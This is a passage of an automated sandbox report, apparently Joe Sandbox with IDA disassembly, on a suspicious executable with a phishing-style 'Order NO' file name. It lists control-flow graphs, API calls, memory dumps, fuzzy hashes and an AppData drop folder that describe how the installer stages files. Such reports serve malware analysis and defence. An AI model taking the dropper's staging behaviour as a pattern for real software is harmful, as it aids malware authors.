                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp
                                                  • API String ID: 2655323295-2967713064
                                                  • Opcode ID: 2d77ac209ad71615f5808e7cf79d7c16757800db2c4d3381873f5c9cabcdec34
                                                  • Instruction ID: bf0ef5d62df918b2bfabe39acf8ac680016d82ecec6d2e1c9a4cf4f2d71e963b
                                                  • Opcode Fuzzy Hash: 2d77ac209ad71615f5808e7cf79d7c16757800db2c4d3381873f5c9cabcdec34
                                                  • Instruction Fuzzy Hash: 2911A231D00115BEEB10AFA58E4AAAEB6B4EB44318F21443FF404B71D1C7B88E419668

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 843 4061c1-4061cd 844 4061ce-406202 GetTickCount GetTempFileNameW 843->844 845 406211-406213 844->845 846 406204-406206 844->846 848 40620b-40620e 845->848 846->844 847 406208 846->847 847->848
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004061DF
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403663,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F), ref: 004061FA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3083371207
                                                  • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                  • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                  • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                  • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 933 4015e6-4015fa call 402dcb call 40601c 938 401656-401659 933->938 939 4015fc-40160f call 405f9e 933->939 941 401688-40231b call 401423 938->941 942 40165b-40167a call 401423 call 4066a2 SetCurrentDirectoryW 938->942 947 401611-401614 939->947 948 401629-40162c call 405c50 939->948 955 402c4f-402c5e 941->955 942->955 958 401680-401683 942->958 947->948 952 401616-40161d call 405c6d 947->952 954 401631-401633 948->954 952->948 963 40161f-401622 call 405bf6 952->963 959 401635-40163a 954->959 960 40164c-401654 954->960 958->955 964 401649 959->964 965 40163c-401647 GetFileAttributesW 959->965 960->938 960->939 968 401627 963->968 964->960 965->960 965->964 968->954
                                                  APIs
                                                    • Part of subcall function 0040601C: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,?,00406090,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"), ref: 0040602A
                                                    • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                    • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                    • Part of subcall function 00405BF6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C38
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Premolder\Mokl,?,00000000,000000F0), ref: 00401672
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Premolder\Mokl, xrefs: 00401665
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\Premolder\Mokl
                                                  • API String ID: 1892508949-3722675925
                                                  • Opcode ID: 4cb2efcab3ed91e86469b60195f9e2d97d0acca59b31887f55ab244e2f30bca3
                                                  • Instruction ID: af3d40abcb4b92d5c03464ca519eb5fb88e5f0cb8c812bf2788953b75bb9e179
                                                  • Opcode Fuzzy Hash: 4cb2efcab3ed91e86469b60195f9e2d97d0acca59b31887f55ab244e2f30bca3
                                                  • Instruction Fuzzy Hash: B911B231504514EBDF20AFA5CD4169F36A0EF14368B29493FE942B22F1D63E8981DA5D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 973 4071f5-4071fb 974 407200-40721e 973->974 975 4071fd-4071ff 973->975 976 4074f1-4074fe 974->976 977 40742c-407441 974->977 975->974 980 407528-40752c 976->980 978 407443-407459 977->978 979 40745b-407471 977->979 981 407474-40747b 978->981 979->981 982 40758c-40759f 980->982 983 40752e-40754f 980->983 984 4074a2 981->984 985 40747d-407481 981->985 986 4074a8-4074ae 982->986 987 407551-407566 983->987 988 407568-40757b 983->988 984->986 990 407630-40763a 985->990 991 407487-40749f 985->991 993 406c53 986->993 994 40765b 986->994 989 40757e-407585 987->989 988->989 995 407525 989->995 996 407587 989->996 997 407646-407659 990->997 991->984 999 406c5a-406c5e 993->999 1000 406d9a-406dbb 993->1000 1001 406cff-406d03 993->1001 1002 406d6f-406d73 993->1002 998 40765e-407662 994->998 995->980 1006 40750a-407522 996->1006 1007 40763c 996->1007 997->998 999->997 1008 406c64-406c71 999->1008 1000->977 1004 406d09-406d22 1001->1004 1005 4075af-4075b9 1001->1005 1009 406d79-406d8d 1002->1009 1010 4075be-4075c8 1002->1010 1011 406d25-406d29 1004->1011 1005->997 1006->995 1007->997 1008->994 1012 406c77-406cbd 1008->1012 1013 406d90-406d98 1009->1013 1010->997 1011->1001 1014 406d2b-406d31 1011->1014 1015 406ce5-406ce7 1012->1015 1016 406cbf-406cc3 1012->1016 1013->1000 1013->1002 1017 406d33-406d3a 1014->1017 1018 406d5b-406d6d 1014->1018 1021 406cf5-406cfd 1015->1021 1022 406ce9-406cf3 1015->1022 1019 406cc5-406cc8 GlobalFree 1016->1019 1020 406cce-406cdc GlobalAlloc 1016->1020 1023 406d45-406d55 GlobalAlloc 1017->1023 1024 406d3c-406d3f GlobalFree 1017->1024 1018->1013 1019->1020 1020->994 1025 406ce2 1020->1025 1021->1011 1022->1021 1022->1022 1023->994 1023->1018 1024->1023 1025->1015
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                  • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                  • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                  • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                  • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                  • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                  • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                  • Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
                                                  • Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                  • Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                  • Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
                                                  • Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                  • Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                  • Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
                                                  • Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                  • Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                  • Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
                                                  • Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                  • Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                  • Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
                                                  • Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                  • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004034B2
                                                    • Part of subcall function 0040361D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
                                                  • SetFilePointer.KERNELBASE(00005980,00000000,00000000,00414EF0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: FilePointer$CountTick
                                                  • String ID:
                                                  • API String ID: 1092082344-0
                                                  • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                  • Instruction ID: f81ac03ea206090be76b65a385b2ac7d4b581aa0cbae2b80a2d2021fe8c89915
                                                  • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                  • Instruction Fuzzy Hash: 7E319CB2600201EFC7209F29EE859263FA9F740356B55023BF901B22F1CBB59E41DB9C
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                    • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                    • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: b0b9f58de50adf3bfd6b74d5e3cc97da94eb377dbbb3c3ea9cb598495227c431
                                                  • Instruction ID: 77040aa306750b8c28c9decefed3201328e3be048babc7be2d350fd99aa9233c
                                                  • Opcode Fuzzy Hash: b0b9f58de50adf3bfd6b74d5e3cc97da94eb377dbbb3c3ea9cb598495227c431
                                                  • Instruction Fuzzy Hash: A3219F31904204EADF10AFA5CF89A9E7A71BF44359F30413BE105B91E5CBBD8982DA2D
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
